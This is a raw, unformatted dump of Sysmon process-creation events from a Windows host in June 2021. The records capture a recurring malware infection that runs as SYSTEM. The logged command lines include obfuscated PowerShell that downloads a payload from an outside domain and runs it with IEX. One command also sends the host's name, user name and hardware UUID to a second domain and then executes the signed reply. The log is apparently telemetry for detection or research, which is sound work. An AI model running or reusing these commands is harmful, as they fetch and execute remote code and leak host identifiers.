154100x80000000000000002742413Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 09:55:11.214{E265CAAD-557F-60B7-4393-08000000C601}9988C:\Windows\System32\WindowsPowerShell\v1.0\lVN8MeO.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXElVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{E265CAAD-557E-60B7-3F93-08000000C601}6196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002742411Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 09:55:11.207{E265CAAD-557F-60B7-4293-08000000C601}15508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^&PROJECT-SAOPAUL^&EC284255-77A1-2470-02B5-3CB5C2626148^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-557E-60B7-3F93-08000000C601}6196C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002742291Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 09:55:10.689{E265CAAD-557E-60B7-3F93-08000000C601}6196C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-5574-60B7-2693-08000000C601}4424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?ipco_20210531?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) 154100x80000000000000002661020Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 08:55:18.379{E265CAAD-4776-60B7-AC47-08000000C601}12768C:\Windows\System32\WindowsPowerShell\v1.0\lVN8MeO.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXElVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{E265CAAD-4776-60B7-A947-08000000C601}12420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002661018Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 08:55:18.375{E265CAAD-4776-60B7-AB47-08000000C601}29140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^&PROJECT-SAOPAUL^&EC284255-77A1-2470-02B5-3CB5C2626148^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-4776-60B7-A947-08000000C601}12420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002661014Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 08:55:18.304{E265CAAD-4776-60B7-A947-08000000C601}12420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-4764-60B7-0A47-08000000C601}1136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?ipco_20210531?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) 154100x80000000000000002579386Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 07:55:12.407{E265CAAD-3960-60B7-EFFC-07000000C601}28148C:\Windows\System32\WindowsPowerShell\v1.0\lVN8MeO.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXElVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{E265CAAD-3960-60B7-EBFC-07000000C601}16252C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002579384Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 07:55:12.402{E265CAAD-3960-60B7-EEFC-07000000C601}16232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^&PROJECT-SAOPAUL^&EC284255-77A1-2470-02B5-3CB5C2626148^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)"C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-3960-60B7-EBFC-07000000C601}16252C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - 154100x80000000000000002579263Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 07:55:12.023{E265CAAD-3960-60B7-EBFC-07000000C601}16252C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{E265CAAD-3954-60B7-D2FC-07000000C601}4404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c function a($u){$d=[text.encoding]::utf8.getbytes((new-object IO.StreamReader([net.webrequest]::create($u).getresponse().getresponsestream())).readtoend());$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com'+'/a.jsp?ipco_20210531?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*');a($url) 154100x80000000000000002499139Microsoft-Windows-Sysmon/Operationalproject-saopaulo-host-2021-06-02 06:55:14.882{E265CAAD-2B52-60B7-F2AF-07000000C601}29108C:\Windows\System32\WindowsPowerShell\v1.0\lVN8MeO.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXElVN8MeO.exe - C:\Windows\TEMP\NT AUTHORITY\SYSTEM{E265CAAD-4502-60B5-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{E265CAAD-2B52-60B7-EEAF-07000000C601}25040C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='efca879392da3285f8ee02fb87b8d3a1';$ifp=$env:tmp+'\kr.bin';$down_url='http://d.u78wjdu.com';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?ipco_20210531^^^&PROJECT-SAOPAUL^^^&EC284255-77A1-2470-02B5-3CB5C2626148^^^&02:96:3A:2D:70:38');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|lVN8MeO.exe -